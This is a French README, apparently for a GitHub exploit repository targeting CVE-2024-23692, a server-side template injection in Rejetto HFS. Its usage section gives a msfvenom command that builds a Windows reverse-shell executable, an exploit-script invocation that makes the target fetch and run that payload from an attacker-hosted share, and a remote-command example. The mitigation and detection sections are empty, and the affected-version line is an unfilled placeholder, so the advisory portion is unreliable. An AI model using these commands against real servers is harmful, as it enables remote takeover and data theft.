
Rejetto HFS (HTTP File Server) est un simple serveur de fichiers web qui facilite le partage de fichiers sur un réseau ou Internet.
Rejetto HFS (HTTP File Server) est un serveur de fichiers web simple qui facilite le partage de fichiers sur un réseau ou internet. Malgré sa facilité d'utilisation et sa simplicité, une vulnérabilité critique (CVE-2024-23692) a été découverte, faisant du serveur une cible pour les attaquants.
CVE-2024-23692 est une vulnérabilité d'injection de modèles côté serveur (SSTI) identifiée dans Rejetto HFS. Cette vulnérabilité permet à un attaquant d'injecter et d'exécuter des modèles malveillants sur le serveur. Si elle est exploitée, elle peut conduire à une exécution de code à distance, compromettant potentiellement l'ensemble du serveur et les données qu'il héberge.
Un attaquant exploitant cette vulnérabilité peut :
Obtenez un shell en utilisant un binaire malveillant créé avec msfvenom.
Remarque : Laissez nc en écoute.
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
Exécutez une commande à distance.
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
L'affichage du résultat peut prendre environ 15 secondes.
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
Toutes les versions de Rejetto HFS jusqu'à la version [insert latest vulnerable version here] inclus sont affectées par cette vulnérabilité.
Pour atténuer le risque posé par CVE-2024-23692, il est conseillé aux utilisateurs de :
Pour déterminer si votre serveur a été compromis, recherchez :
Pour obtenir de l'aide et un soutien supplémentaires, référez-vous aux forums de la communauté Rejetto HFS ou aux canaux d'assistance officiels.
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.